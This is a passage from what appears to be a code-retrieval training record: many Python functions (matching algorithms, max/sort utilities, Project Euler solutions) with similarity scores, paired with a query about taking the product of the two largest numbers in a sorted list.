DEBUG('SUBSTAGE')\r\n\r\n # Continue labeling until all vertices which are reachable\r\n # through an alternating path have got a label.\r\n while queue and not augmented:\r\n\r\n # Take an S vertex from the queue.\r\n v = queue.pop()\r\n if DEBUG: DEBUG('POP v=%d' % v)\r\n assert label[inblossom[v]] == 1\r\n\r\n # Scan its neighbours:\r\n for p in neighbend[v]:\r\n k = p // 2\r\n w = endpoint[p]\r\n # w is a neighbour to v\r\n if inblossom[v] == inblossom[w]:\r\n # this edge is internal to a blossom; ignore it\r\n continue\r\n if not allowedge[k]:\r\n kslack = slack(k)\r\n if kslack <= 0:\r\n # edge k has zero slack => it is allowable\r\n allowedge[k] = True\r\n if allowedge[k]:\r\n if label[inblossom[w]] == 0:\r\n # (C1) w is a free vertex;\r\n # label w with T and label its mate with S (R12).\r\n assignLabel(w, 2, p ^ 1)\r\n elif label[inblossom[w]] == 1:\r\n # (C2) w is an S-vertex (not in the same blossom);\r\n # follow back-links to discover either an\r\n # augmenting path or a new blossom.\r\n base = scanBlossom(v, w)\r\n if base >= 0:\r\n # Found a new blossom; add it to the blossom\r\n # bookkeeping and turn it into an S-blossom.\r\n addBlossom(base, k)\r\n else:\r\n # Found an augmenting path; augment the\r\n # matching and end this stage.\r\n augmentMatching(k)\r\n augmented = 1\r\n break\r\n elif label[w] == 0:\r\n # w is inside a T-blossom, but w itself has not\r\n # yet been reached from outside the blossom;\r\n # mark it as reached (we need this to relabel\r\n # during T-blossom expansion).\r\n assert label[inblossom[w]] == 2\r\n label[w] = 2\r\n labelend[w] = p ^ 1\r\n elif label[inblossom[w]] == 1:\r\n # keep track of the least-slack non-allowable edge to\r\n # a different S-blossom.\r\n b = inblossom[v]\r\n if bestedge[b] == -1 or kslack < slack(bestedge[b]):\r\n bestedge[b] = k\r\n elif label[w] == 0:\r\n # w is a free vertex (or an unreached vertex inside\r\n # a T-blossom) but we can not reach it yet;\r\n # keep track of the least-slack edge that reaches w.\r\n if bestedge[w] == -1 or kslack < slack(bestedge[w]):\r\n bestedge[w] = k\r\n\r\n if augmented:\r\n break\r\n\r\n # There is no augmenting path under these constraints;\r\n # compute delta and reduce slack in the optimization problem.\r\n # (Note that our vertex dual variables, edge slacks and delta's\r\n # are pre-multiplied by two.)\r\n deltatype = -1\r\n delta = deltaedge = deltablossom = None\r\n\r\n # Verify data structures for delta2/delta3 computation.\r\n if CHECK_DELTA:\r\n checkDelta2()\r\n checkDelta3()\r\n\r\n # Compute delta1: the minumum value of any vertex dual.\r\n if not maxcardinality:\r\n deltatype = 1\r\n delta = min(dualvar[:nvertex])\r\n\r\n # Compute delta2: the minimum slack on any edge between\r\n # an S-vertex and a free vertex.\r\n for v in range(nvertex):\r\n if label[inblossom[v]] == 0 and bestedge[v] != -1:\r\n d = slack(bestedge[v])\r\n if deltatype == -1 or d < delta:\r\n delta = d\r\n deltatype = 2\r\n deltaedge = bestedge[v]\r\n\r\n # Compute delta3: half the minimum slack on any edge between\r\n # a pair of S-blossoms.\r\n for b in range(2 * nvertex):\r\n if ( blossomparent[b] == -1 and label[b] == 1 and\r\n bestedge[b] != -1 ):\r\n kslack = slack(bestedge[b])\r\n if isinstance(kslack, integer_types):\r\n assert (kslack % 2) == 0\r\n d = kslack // 2\r\n else:\r\n d = kslack / 2\r\n if deltatype == -1 or d < delta:\r\n delta = d\r\n deltatype = 3\r\n deltaedge = bestedge[b]\r\n\r\n # Compute delta4: minimum z variable of any T-blossom.\r\n for b in range(nvertex, 2*nvertex):\r\n if ( blossombase[b] >= 0 and blossomparent[b] == -1 and\r\n label[b] == 2 and\r\n (deltatype == -1 or dualvar[b] < delta) ):\r\n delta = dualvar[b]\r\n deltatype = 4\r\n deltablossom = b\r\n\r\n if deltatype == -1:\r\n # No further improvement possible; max-cardinality optimum\r\n # reached. Do a final delta update to make the optimum\r\n # verifyable.\r\n assert maxcardinality\r\n deltatype = 1\r\n delta = max(0, min(dualvar[:nvertex]))\r\n\r\n # Update dual variables according to delta.\r\n for v in range(nvertex):\r\n if label[inblossom[v]] == 1:\r\n # S-vertex: 2*u = 2*u - 2*delta\r\n dualvar[v] -= delta\r\n elif label[inblossom[v]] == 2:\r\n # T-vertex: 2*u = 2*u + 2*delta\r\n dualvar[v] += delta\r\n for b in range(nvertex, 2*nvertex):\r\n if blossombase[b] >= 0 and blossomparent[b] == -1:\r\n if label[b] == 1:\r\n # top-level S-blossom: z = z + 2*delta\r\n dualvar[b] += delta\r\n elif label[b] == 2:\r\n # top-level T-blossom: z = z - 2*delta\r\n dualvar[b] -= delta\r\n\r\n # Take action at the point where minimum delta occurred.\r\n if DEBUG: DEBUG('delta%d=%f' % (deltatype, delta))\r\n if deltatype == 1: \r\n # No further improvement possible; optimum reached.\r\n break\r\n elif deltatype == 2:\r\n # Use the least-slack edge to continue the search.\r\n allowedge[deltaedge] = True\r\n (i, j, wt) = edges[deltaedge]\r\n if label[inblossom[i]] == 0:\r\n i, j = j, i\r\n assert label[inblossom[i]] == 1\r\n queue.append(i)\r\n elif deltatype == 3:\r\n # Use the least-slack edge to continue the search.\r\n allowedge[deltaedge] = True\r\n (i, j, wt) = edges[deltaedge]\r\n assert label[inblossom[i]] == 1\r\n queue.append(i)\r\n elif deltatype == 4:\r\n # Expand the least-z blossom.\r\n expandBlossom(deltablossom, False)\r\n\r\n # End of a this substage.\r\n\r\n # Stop when no more augmenting path can be found.\r\n if not augmented:\r\n break\r\n\r\n # End of a stage; expand all S-blossoms which have dualvar = 0.\r\n for b in range(nvertex, 2*nvertex):\r\n if ( blossomparent[b] == -1 and blossombase[b] >= 0 and\r\n label[b] == 1 and dualvar[b] == 0 ):\r\n expandBlossom(b, True)\r\n\r\n # Verify that we reached the optimum solution.\r\n if CHECK_OPTIMUM:\r\n verifyOptimum()\r\n\r\n # Transform mate[] such that mate[v] is the vertex to which v is paired.\r\n for v in range(nvertex):\r\n if mate[v] >= 0:\r\n mate[v] = endpoint[mate[v]]\r\n for v in range(nvertex):\r\n assert mate[v] == -1 or mate[mate[v]] == v\r\n\r\n return mate", "def solveProblem027():\n primes = getPrimeRange(0, 5000000)\n biggestConseqPrimes = 0\n coefficients = (0, 0)\n # b has to be a prime number or else n = 0 doesn't come out prime\n bRange = getPrimeRange(0, 1000)\n for a in range(-999, 1000, 1):\n print(a)\n for b in bRange:\n n = 0\n numConseqPrimes = 0\n while True:\n if ((n**2) + (a * n) + b) in primes:\n numConseqPrimes += 1\n n += 1\n else:\n break\n if n > biggestConseqPrimes:\n biggestConseqPrimes = n\n coefficients = (a, b)\n print(\"The coefficients that produce the largest number of consecutive\" \\\n \"primes are a = %d b = %d\" % (coefficients))\n print(\"The product of the coefficients is %d\" % (coefficients[a] * \\\n coefficients[b])\n\nif __name__ == \"__main__\":\n solveProblem027()", "def get_most_combined_products(self):\n self.product_pairs = self.products.groupby(\"id\").agg({\"products\": lambda x: list(x)}).reset_index()\n self.product_pairs['product_pairs'] = self.product_pairs['products'].apply(\n lambda x: np.array(list(product(x, x))).tolist())\n self.product_pairs = pd.DataFrame(np.concatenate(list(self.product_pairs['product_pairs'])).tolist())\n self.product_pairs['total_pairs'] = 1\n self.product_pairs = self.product_pairs[self.product_pairs[0] != self.product_pairs[1]]\n self.product_pairs = self.product_pairs.groupby([0, 1]).agg({\"total_pairs\": \"sum\"}).reset_index()\n self.product_pairs = self.product_pairs.sort_values('total_pairs', ascending=False)\n self.product_pairs = self.product_pairs.rename(columns={0: \"pair_1\", 1: \"pair_2\"})\n self.product_pairs['product_pair'] = self.product_pairs.apply(\n lambda row: \" - \".join(list(sorted([row['pair_1'], row['pair_2']]))), axis=1)\n self.product_pairs = self.product_pairs.groupby(\"product_pair\").agg({\"total_pairs\": \"first\"}).reset_index()\n return self.product_pairs", "def largest_product(digits, size):\n # Why does a blank set of digits have a maximum product of 1?\n slice_list = slices(digits, size)\n def mult_reduce(items):\n total = 1\n for i in items:\n total *= i\n return total\n slice_list = [mult_reduce(l) for l in slice_list]\n return max(slice_list)", "def max_power_in_candidate_storage_rule(_m, g, y, s, t):\r\n\r\n return m.p_in[g, y, s, t] - sum(m.x_c[g, j] for j in m.Y if j <= y) <= 0", "def v10_multimax(iterable, key=lambda x: x):\n max_key = None\n maximums = []\n for item in iterable:\n k = key(item)\n if k == max_key:\n maximums.append(item)\n elif not maximums or k > max_key:\n maximums = [item]\n max_key = k\n return maximums", "def get_cross_prod(self):\n ret = 1\n for dec in self.decisions:\n ret *= self.get_num_alt(dec)\n return ret", "def get_sub_combinations(maxop):\n combo = collections.defaultdict(list)\n for numops in range(maxop+1):\n if numops:\n combo[numops, 1].append((numops-1,))\n for op1 in range(numops):\n combo[numops, 2].append((op1, numops - op1 - 1))\n for op2 in range(numops - op1):\n combo[numops, 3].append((op1, op2, numops - op1 - op2 - 1))\n return combo", "def maxSumOfThreeSubarrays(self, nums, k):\n\n if not nums or k <= 0:\n raise Exception(\"Invalid Exception!\")\n\n n = len(nums)\n if k*3 > n:\n return []\n\n dp1 = [(0, None)] * n\n dp2 = [(0, None)] * n\n\n # base case\n dp1[k-1] = (sum(nums[:k]), 0)\n dp2[n-k] = (sum(nums[n-k:n]), n-k)\n\n # transition\n for i in range(k, n):\n pmax_sum, _ = dp1[i-1]\n max_sum = sum(nums[i-k+1:i+1])\n if max_sum > pmax_sum:\n dp1[i] = (max_sum, i-k+1)\n else:\n dp1[i] = dp1[i-1]\n\n for i in range(n-k-1, -1, -1):\n smax_sum, _ = dp2[i+1]\n max_sum = sum(nums[i:i+k])\n if max_sum >= smax_sum:\n dp2[i] = (max_sum, i)\n else:\n dp2[i] = dp2[i+1]\n\n max_sum = 0\n for i in range(k, n-k):\n curr_max_sum = dp1[i-1][0] + dp2[i+k][0] + sum(nums[i:i+k])\n if curr_max_sum > max_sum:\n ans = [dp1[i-1][1], i, dp2[i+k][1]]\n max_sum = curr_max_sum\n return ans", "def max_profit(prices: List[int]) -> int:", "def m(self):\n\t\tn = 0\n\t\ti = self.k0\n\t\twhile 1:\n\t\t\tif i > self.j:\n\t\t\t\treturn n\n\t\t\tif not self.cons(i):\n\t\t\t\tbreak\n\t\t\ti = i + 1\n\t\ti = i + 1\n\t\twhile 1:\n\t\t\twhile 1:\n\t\t\t\tif i > self.j:\n\t\t\t\t\treturn n\n\t\t\t\tif self.cons(i):\n\t\t\t\t\tbreak\n\t\t\t\ti = i + 1\n\t\t\ti = i + 1\n\t\t\tn = n + 1\n\t\t\twhile 1:\n\t\t\t\tif i > self.j:\n\t\t\t\t\treturn n\n\t\t\t\tif not self.cons(i):\n\t\t\t\t\tbreak\n\t\t\t\ti = i + 1\n\t\t\ti = i + 1", "def recommend_next_product(self, prod_list):\n scores = defaultdict(float)\n for prod in prod_list:\n for item in self._purchased.find({PROD1: prod}):\n if not item[PROD2] in prod_list:\n scores[item[PROD2]] += math.log(item[TIMES])\n if len(scores) == 0:\n return None\n max_tuple = max(scores.items(), key = operator.itemgetter(1))\n return max_tuple[0]", "def max_ij(f, K):\n i_best, j_best, m_value_min = min_ij(lambda i, j: (-1) * f(i, j), K)\n return i_best, j_best, - m_value_min", "def brute_force_algorithm(clauses, literals):\n n = 2**literals\n num_of_clauses = len(clauses)\n\n max = 0\n res_val_list = []\n\n for i in range(n):\n valuation_list, curr_max = solution(i, literals, clauses)\n\n if curr_max > max:\n max = curr_max\n res_val_list = valuation_list\n\n if max == num_of_clauses:\n break\n\n return (max, res_val_list)", "def max_power_candidate_thermal_rule(_m, g, y, s, t):\r\n\r\n return m.p[g, y, s, t] - sum(m.x_c[g, j] for j in m.Y if j <= y) <= 0", "def most_parallel_vector(v, vectors, tolerance_dot=0.0):\n\n best_dot = tolerance_dot\n best_w = None\n for w in vectors:\n d = abs_dot(v, w)\n if d > best_dot:\n best_dot = d\n best_w = w\n return best_w" ]
[ "0.76415133", "0.7435716", "0.7419571", "0.73527825", "0.6995507", "0.6947662", "0.6701412", "0.66534376", "0.66308546", "0.6610363", "0.65937907", "0.65213996", "0.65124816", "0.6395902", "0.63665193", "0.63143504", "0.62744373", "0.62582433", "0.62466544", "0.6241433", "0.6220394", "0.61534584", "0.6126939", "0.6095926", "0.608856", "0.6063815", "0.60294616", "0.6018269", "0.6014992", "0.6013762", "0.60130626", "0.60000646", "0.5979464", "0.5951742", "0.5951518", "0.5951455", "0.5950986", "0.590952", "0.5887022", "0.58768433", "0.5868189", "0.5863492", "0.58372486", "0.58310497", "0.58245116", "0.58113253", "0.580621", "0.5797005", "0.5783159", "0.5777067", "0.57670045", "0.5754826", "0.5754648", "0.5747182", "0.5744478", "0.57415664", "0.57378715", "0.57324886", "0.57108665", "0.57053155", "0.5699443", "0.56951106", "0.56904656", "0.5688949", "0.5671796", "0.5658226", "0.56512576", "0.56400144", "0.563292", "0.5605755", "0.5595705", "0.5594418", "0.5592832", "0.55820906", "0.55815816", "0.55786806", "0.5575631", "0.5568063", "0.5567838", "0.5565691", "0.5556445", "0.5548779", "0.553822", "0.55370665", "0.5527635", "0.55167675", "0.5507951", "0.5495496", "0.5490604", "0.5479136", "0.5474535", "0.5468124", "0.5464875", "0.54635113", "0.5460514", "0.54592055", "0.5456166", "0.5453376", "0.5451865", "0.5448363" ]
0.7392273
3
Sort the list first, then take the last two number (biggest) and multiply them
def max_pairwise_product_sort(numbers): sorted_list = sorted(numbers) ans = sorted_list[-1]*sorted_list[-2] return ans
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def greatest_difference(num_list):", "def highest_product_2(arr):\n\n # make a list to store the highest three ints, initializing to first three\n maxes = [arr[0], arr[1], arr[2]]\n\n # find the lowest of the highest three ints\n lowest_max = min(maxes)\n\n # go through the rest of the list to check for higher values\n for num in arr[3:]:\n # if any value is higher than the lowest max, update maxes list\n if num > lowest_max:\n # remove the old maximum\n maxes.remove(lowest_max)\n # add the new one\n maxes.append(num)\n # recalculate the lowest max for continued comparison\n lowest_max = min(maxes)\n\n return maxes[0] * maxes[1] * maxes[2]", "def max_pairwise_product_sort(array):\n if len(array) <= 1:\n return 0\n\n array.sort()\n\n return array[-1] * array[-2]", "def nth_largest2(a_list, n):\n a_list.sort()\n new_list = a_list[::-1]\n return new_list[n-1]", "def max_in_list(list):\n x=list[0] #set x be the first number in the list\n for i in range(0,len(list)):#go over the number in the list\n if x<=list[i]: #if the second one is bigger than the first\n x=list[i] #assign x to the bigger one\n else:\n continue#repeat until find the max number\n return x", "def max_pairwise_product_fast(numbers):\n num_list = numbers.copy()\n max_num_1 = max(num_list)\n num_list.remove(max_num_1)\n max_num_2 = max(num_list)\n ans = max_num_1*max_num_2\n return ans", "def question_22(list_num: float) -> float:\n list_num.sort()\n return list_num[0:3]", "def second_largest(number_list):\n for i in range(len(number_list)):\n for j in range(len(number_list) - 1 - i):\n if number_list[j] > number_list[j+1]:\n number_list[j + 1], number_list[j] = number_list[j], number_list[j+1]\n\n return number_list[-2]", "def largest(n,xs):\n return sorted(xs, reverse = True)[:n][::-1]", "def find_greatest_number(incoming_list: list):\n return max(incoming_list)", "def find_greatest_number(incoming_list):\n retval = max(incoming_list)\n return retval", "def my_max(in_list):\n biggest = in_list[0]\n for l in in_list:\n if l > biggest:\n biggest = l\n return biggest", "def maximumProduct2(self, nums: List[int]) -> int:\n big_1 = big_2 = big_3 = -float(\"inf\")\n small_1 = small_2 = float(\"inf\")\n for n in nums:\n if n >= big_1:\n big_1, big_2, big_3 = n, big_1, big_2\n elif n >= big_2:\n big_2, big_3 = n, big_2\n elif n >= big_3:\n big_3 = n\n \n if n <= small_1:\n small_1, small_2 = n, small_1\n elif n <= small_2:\n small_2 = n\n \n return max(big_1 * big_2 * big_3, big_1 * small_1 * small_2)", "def question_21(list_num: float) -> float:\n list_num.sort(reverse=True)\n return list_num[0:3]", "def highest_product(arr):\n\n product = 1\n\n for i in range(3):\n # find the max value in the list, get the index, pop it, and mulitply\n product *= arr.pop(arr.index(max(arr)))\n\n return product", "def calc_max(data: list) -> float:\n acc = data[0]\n for n in data:\n if n > acc:\n acc = n\n return float(acc)", "def find_greatest_number(incoming_list):\n #magiclownumber= none\n #retval= magiclownumber\n #for value in incoming_list:\n #if not retval:\n #retval = value\n # if value> retvale\n #retval= value\n #return retval\n greatest_number = max(incoming_list)\n return greatest_number", "def max_(lst: Iterable[int]) -> int:\n return reduce(lambda x, y: x if x > y else y, lst)", "def largest_item(list):\n pass", "def find_greatest_number(incoming_list):\n #return_value = max(incoming_list)\n #return return_value\n\n MAGIC_LOW_NUMBER = None\n retval = MAGIC_LOW_NUMBER\n\n # 1,2,3,4,5,1\n # MAGIC_LOW_NUMBER, 1 ->STORE 1\n #1 , 2 ->STORE 2\n #2, , 3 ->STORE 3\n #3, , 4 ->STORE 4 \n #4, , 5 ->STORE 5\n #5, , 1 ->??? nothing \n for value in incoming_list:\n if not retval:\n retval = value\n if value > retval:\n retval = value", "def largest_ten(list1):\n result = []\n for i in range(10):\n max1 = list1[0]\n for j in list1:\n if max1 < j:\n max1 = j\n result.append(max1) ##the final target is the max1 when finishing this loop\n list1.remove(max1)\n\n return result", "def main(num, li1, list2):\n li1 = [[float(input()), float(input())] for i in range(num)]\n list2 = [li1[i][1]/li1[i][0] for i in range(num)]\n li1.sort(key=lambda x: x[0])\n for i in range(num):\n if li1[i][1]/li1[i][0] == max(list2):\n return print(\"%.2f %.2f\"%(li1[i][0], li1[i][1]))", "def get_max_loot(input_list):\n even = sum(input_list[::2])\n odd = sum(input_list[1::2])\n return even if even > odd else odd", "def findSecondLargest(self):\n l = []\n self.flatten(l)\n print(l)\n print(l[-2])", "def max_pairwise_product_linear(array):\n\n if len(array) <= 1:\n return 0\n\n two_biggest_values = [0, 0]\n\n for element in array:\n if element > two_biggest_values[0]:\n two_biggest_values[0] = element\n elif element > two_biggest_values[1]:\n two_biggest_values[1] = element\n\n return two_biggest_values[0] * two_biggest_values[1]", "def find_largest_number_in_list(self, list_with_numbers):\n return 0", "def get_sum_of_greatest_elements(my_list, x):\r\n result = []\r\n for i in range(0, x):\r\n max1 = 0\r\n for j in range(len(my_list)):\r\n if my_list[j] > max1:\r\n max1 = my_list[j]\r\n my_list.remove(max1)\r\n result.append(max1)\r\n\r\n count = 0\r\n for x in result:\r\n count += x\r\n return count", "def max_num(num_list):\n\n return max(num_list)", "def radix_sort(mylist):\n max_num = max(mylist)\n position = 1 # Find decimal position\n while len(str(max_num)) <= len(str(position)): # Go for as many decimal places in largest num\n int(position)\n counting_sort(mylist, position) # Sort by decimal place\n position *= 10 # Increase to next left decimal place", "def two_largest(inlist):\n largest = second_largest = 0\n it1 = it2 = 0\n\n for i,item in enumerate(inlist):\n if item > largest:\n largest = item\n it1 = i\n elif largest > item > second_largest:\n second_largest = item\n it2 = i\n # Return the results as a tuple\n return largest, it1, second_largest, it2", "def pizza_sort(lst):\n length = len(lst)\n def based_god_help_me(lst,index=0):\n if index == length - 1:\n return\n greatest = index_largest(lst[index:]) + index\n lst[greatest], lst[index] = lst[index], lst[greatest]\n based_god_help_me(lst,index+1)\n return based_god_help_me(lst)", "def most_popular_binary(lst_sorted):\n for l in range(1, 11):\n print(l, lst_sorted[-l])", "def maximumProduct1(self, nums: List[int]) -> int:\n s_nums = sorted(nums, reverse=True)\n return max(s_nums[0] * s_nums[1] * s_nums[2], s_nums[0] * s_nums[-1] * s_nums[-2])", "def max_val(t):\n # Your code here\n\n def openItem(term):\n newList = []\n\n for item in term:\n if type(item) == int:\n newList.append(item)\n\n else:\n newList += openItem(item)\n\n return newList\n\n sortingList = openItem(t)\n\n maximum = sortingList[0]\n\n for item in sortingList:\n if maximum < item:\n maximum = item\n\n return maximum", "def sum_abs_biggest_3_value(list_data):\n data = copy.deepcopy(list_data)\n data.sort()\n\n return sum_abs_list(data[-3:])", "def largest_number_at_least_twice_of_others2(nums: [int]) -> int:\n if len(nums) == 1:\n return 0\n\n max_index = nums.index(max(nums))\n max_val = nums.pop(max_index)\n next_max = max(nums)\n\n if next_max * 2 <= max_val:\n return max_index\n return -1", "def sortedSquares(nums: List[int]) -> List[int]:\n return sorted([n*n for n in nums])", "def greedy(items_list, max_cost, key_function):\n tmp_list = sorted(items_list, key=key_function, reverse=True)\n cur_cost = 0\n cur_value = 0\n result = []\n\n for item in tmp_list:\n if cur_cost + item.getCost() <= max_cost:\n result.append(item)\n cur_cost += item.getCost()\n cur_value += item.getValue()\n return result, cur_value", "def rearrange_digits(input_list):\n if len(input_list) == 0:\n raise ValueError(\"input list is empty!\")\n\n heapsort(input_list)\n \n num_1, num_2 = 0, 0\n \n multiplier = 1\n idx = 0\n while idx < len(input_list)-1:\n num_1 += input_list[idx]*multiplier\n num_2 += input_list[idx+1]*multiplier\n multiplier *= 10\n idx += 2\n \n if idx < len(input_list):\n num_1 += input_list[idx]*multiplier\n \n return [num_1, num_2]", "def multiplication_total_of(num_list):", "def max(input: list[int]) -> int:\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n else:\n input.sort()\n return input[-1]", "def maximumToys(moneyAvailable, priceList):\n priceList.sort()\n count = 0\n for toyPrice in priceList:\n if toyPrice <= moneyAvailable:\n count += 1\n moneyAvailable -= toyPrice\n else:\n return count", "def burbuja(lista:list):\n vector = lista\n for i in range(0, len(vector)-1):\n for j in range(0, len(vector)-1):\n if vector[j] > vector[j+1]:\n tmp = vector[j+1]\n vector[j+1] = vector[j]\n vector[j] = tmp\n return vector", "def largest_two():\n # Add your code below!", "def question_24(list_num: int) -> int:\n return max(list_num, key=list_num.count)", "def max_profit(prices: List[int]) -> int:", "def find_max(ls):\n\n if len(ls) == 1:\n return ls[0]\n elif len(ls) == 2:\n return ls[0] if ls[0] > ls[1] else ls[1]\n else:\n mid = len(ls) // 2\n m1 = find_max(ls[0:mid])\n m2 = find_max(ls[mid:])\n return m1 if m1 > m2 else m2", "def find_largest_element(num_1, num_2, num_3):\n\n return max([num_1, num_2, num_3])", "def maxVal(item_list, rem_space):\n if item_list == [] or rem_space == 0: # no items or space\n result = (0, ())\n else:\n next_item = item_list[0]\n if next_item.getCost() > rem_space:\n result = maxVal(item_list[1:], rem_space)\n else:\n with_val, with_list = maxVal(item_list[1:],\n rem_space-next_item.getCost())\n with_val += next_item.getValue()\n\n without_val, without_list = maxVal(item_list[1:],\n rem_space)\n if with_val > without_val:\n result = (with_val, with_list + (next_item, ))\n else:\n result = (without_val, without_list)\n return result", "def max_num_in_list(a_list):\n max_number = max(a_list)\n return max_number", "def rearrange_digits(input_list):\n ## Corner cases:\n if len(input_list) == 0:\n return [0, 0]\n elif len(input_list) == 1:\n return [input_list[0], 0]\n\n # Sort an array using merge-sort\n sorted_list = merge_sort(input_list)\n\n # Create two empty array and pop largest number from an sorted_list \n # and push into each empty array one by one\n # This also ensures that the number of digits in both the numbers cannot differ by more than 1\n first_num_list = list()\n second_num_list = list()\n \n while sorted_list:\n first_num_list.append(sorted_list.pop())\n # Break the while loop if array is empty\n if not sorted_list:\n break\n second_num_list.append(sorted_list.pop())\n\n first_num = int(\"\".join(str(i) for i in first_num_list))\n second_num = int(\"\".join(str(i) for i in second_num_list))\n \n # Create an output array of two nums\n out_list = []\n out_list.append(first_num)\n out_list.append(second_num)\n return out_list", "def test_returns_largest_product_within_array(self):\n result = max_product([2,3,-2,4,10,-5,3,2,1])\n self.assertEqual(result, 14400)", "def give_greatest_spart(cls, spart_list):\n if len(spart_list) == 1:\n return spart_list[0]\n sorted_list = cls.sort_by_dominance(spart_list)\n if not(sorted_list[0] > sorted_list[1]):\n print(\"The two largest elements are non-comparable\")\n return []\n else:\n return sorted_list[0]", "def list_max(numbers):\n maxnum = 0\n \n for num in numbers[0:]:\n if num > maxnum:\n maxnum = num\n return maxnum", "def maxProduct2(nums):\n\n maxSubseq = nums[0]\n minSubseq = nums[0]\n res = nums[0]\n for i in range(1, len(nums)):\n if nums[i] < 0:\n minSubseq, maxSubseq = maxSubseq, minSubseq\n maxSubseq = max(nums[i], maxSubseq*nums[i])\n minSubseq = min(nums[i], minSubseq*nums[i])\n res = max(res, maxSubseq)\n return res", "def maximum(some_list):\n return max(some_list)", "def findMaxProduct(n):\n large = 0\n for i in range(len(s)):\n p = 1\n number = s[i:i+n]\n for iteration in range(len(number)):\n h = number[iteration]\n p = p * int(h)\n if p > large:\n large = p\n\n \n return large", "def most_popular(lst):\n lst2 = copy.copy(lst)\n most_pop = []\n\n for j in range(10):\n biggest = 0\n biggest_name = \"\"\n index = 0\n for i in range(len(lst2)):\n if lst2[i][1] > biggest:\n biggest = lst2[i][1]\n biggest_name = lst2[i][0]\n index = i\n most_pop.append((j+1, biggest, biggest_name))\n del lst2[index]\n return most_pop", "def get_majority_element_linear(self, lst):\r\n # Idea: Boyer–Moore majority vote algorithm (O(n) time)\r\n lst, n = sorted(lst), len(lst)\r\n \r\n if n <= 2:\r\n if lst[0] == lst[1]: return 1\r\n else: return -1\r\n \r\n temp_lst, count = [], 1\r\n for i in range(n-1):\r\n if lst[i] == lst[i+1]:\r\n temp_lst.append(lst[i])\r\n count += 1\r\n else: \r\n if count > int(math.floor(n / 2.0)): return count\r\n else: count = 1\r\n i += 1\r\n \r\n return -1", "def largestNumber(self, nums): \n def string_comp(item1, item2):\n return 1 if str(item1) + str(item2) < str(item2) + str(item1) else -1\n res_list = sorted(nums, key=cmp_to_key(string_comp))\n\n # Catch edge case where list of 0s will produce \"000..\" instead of a single \"0\"\n if set(res_list) == {0}:\n return \"0\"\n return \"\".join([str(i) for i in res_list])", "def buble_sort(l):\r\n for i in range(len(l)):\r\n for j in range(i+1, len(l)):\r\n if (l[j-1]>l[j]):\r\n l[j-1], l[j] = l[j], l[j-1]", "def max(l):\n if l:\n s_list = sorted(l)\n return s_list[-1]\n else:\n raise ValueError(\"list empty\")", "def max_profit(l: list) -> int:\n smallest = float(\"inf\")\n largest_profit = 0\n for x in l:\n smallest = min(smallest, x)\n largest_profit = max(x - smallest, largest_profit)\n\n return largest_profit", "def my_max(*args):\n def sorter(sequence):\n \"\"\"\n This function find max in given sequence of simple numbers\n \"\"\"\n def bubble_sort(a):\n \"\"\"\n This function sort the list\n \"\"\"\n for i in reversed(range(len(a))):\n for j in range(1, i + 1):\n if a[j-1] > a[j]:\n a[j], a[j-1] = a[j-1], a[j]\n return a\n\n listed_seq = list(sequence)\n for number in listed_seq:\n if not isinstance(number, int):\n raise ValueError(\"Can't find max, wrong data format\")\n return bubble_sort(listed_seq)[-1]\n\n if not args:\n raise ValueError(\"Can't find max, no data given\")\n if len(args) == 1:\n thing = args[0]\n if isinstance(thing, (list, tuple)):\n return sorter(thing)\n if isinstance(thing, int):\n return thing\n raise ValueError(\"Can't find max, wrong data format\")\n return sorter(args)", "def second_largest(values: List[int]) -> int:\n try:\n return sorted(set(values))[-2]\n except IndexError:\n raise ValueError(\"second_largest() needs at least two distinct values\")", "def findKthLargest(self, nums: List[int], k: int) -> int:\n return sorted(nums)[-k]", "def get_longest_all_primes(lst: list[int]):\n subsecventa_max1 = []\n for i in range(len(lst)):\n for j in range(len(lst)):\n if toate_elementele_prime(lst[i:j + 1]) and len(lst[i:j + 1]) > len(subsecventa_max1):\n subsecventa_max1 = lst[i:j + 1]\n return subsecventa_max1", "def get_majority_element_sort_count(self, lst, left, right):\r\n # get sorted list\r\n sorted_lst = sorted(lst)\r\n \r\n n = len(sorted_lst)\r\n \r\n for i in range(n):\r\n count = sorted_lst.count(sorted_lst[i])\r\n if count > int(math.floor(n / 2.0)): return sorted_lst[i]\r\n \r\n return -1", "def sort(lst):\n n = len(lst)\n done = False\n round = n - 1\n while not done and round:\n done = True\n for i in range(round):\n if lst[i] > lst[i+1]:\n lst[i], lst[i+1] = lst[i+1], lst[i]\n done = False\n round -= 1", "def max_pairwise_product(numbers):\n n = len(numbers)\n max_product = 0\n for first in range(n):\n for second in range(first + 1, n):\n max_product = max(max_product,\n numbers[first] * numbers[second])\n\n return max_product", "def _get_k_largest(lst, k):\n sorted_lst = sorted([(val, index) for index, val in enumerate(lst)])\n return list(reversed(sorted_lst[-k:]))", "def maxProduct(data):\n maxval = float('-inf')\n for i in range(len(data)):\n for j in range(i+1, len(data)):\n if maxval < data[i]*data[j]:\n maxval = data[i]*data[j]\n a,b = (data[i],data[j])\n return tuple([a,b])", "def max(self, num_list):\n try:\n max = int(num_list[0])\n\n for number in num_list:\n try:\n if number > max:\n max = number\n except Exception as e:\n print(\"Error\", e)\n\n except Exception as e:\n print(\"Error:\", e)\n\n return max", "def test_computes_max_nth_digit_by_multiples_of_two(self):\t\t\n\t\tself.assertEqual(64, products_of_multiplied_nth_digits(20, 2))", "def max(input: list[int]) -> int:\n i = 0\n if len(input) == 0:\n raise ValueError(\"max() arg is an empty List\")\n\n else:\n while i < len(input):\n j = i + 1\n while j < len(input):\n if input[i] > input[j]:\n if j == len(input) - 1:\n if input[i] >= input[len(input) - 1]:\n return input[i]\n j += 1\n else:\n j += len(input)\n i += 1\n return input[len(input) - 1]", "def bubble_sort(first):\n # iterate len(lst) times\n for i in range(len(first)):\n\n # integrate [len(lst) - i - 1] times\n for j in range(len(first) - i - 1):\n\n # sort two number if not sorted\n if first[j] > first[j + 1]:\n # swap element at j with element at j + 1\n # and element ad j + 1 with element j\n first[j], first[j + 1] = first[j + 1], first[j]", "def merge_sort(cls, num_list):\n if len(num_list) > 1:\n first_half = num_list[:len(num_list) // 2]\n second_half = num_list[len(num_list) // 2:]\n cls.merge_sort(first_half)\n cls.merge_sort(second_half)\n first_index = 0\n second_index = 0\n list_index = 0\n\n while first_index < len(first_half) and \\\n second_index < len(second_half):\n if first_half[first_index] > second_half[second_index]:\n num_list[list_index] = second_half[second_index]\n second_index += 1\n else:\n num_list[list_index] = first_half[first_index]\n 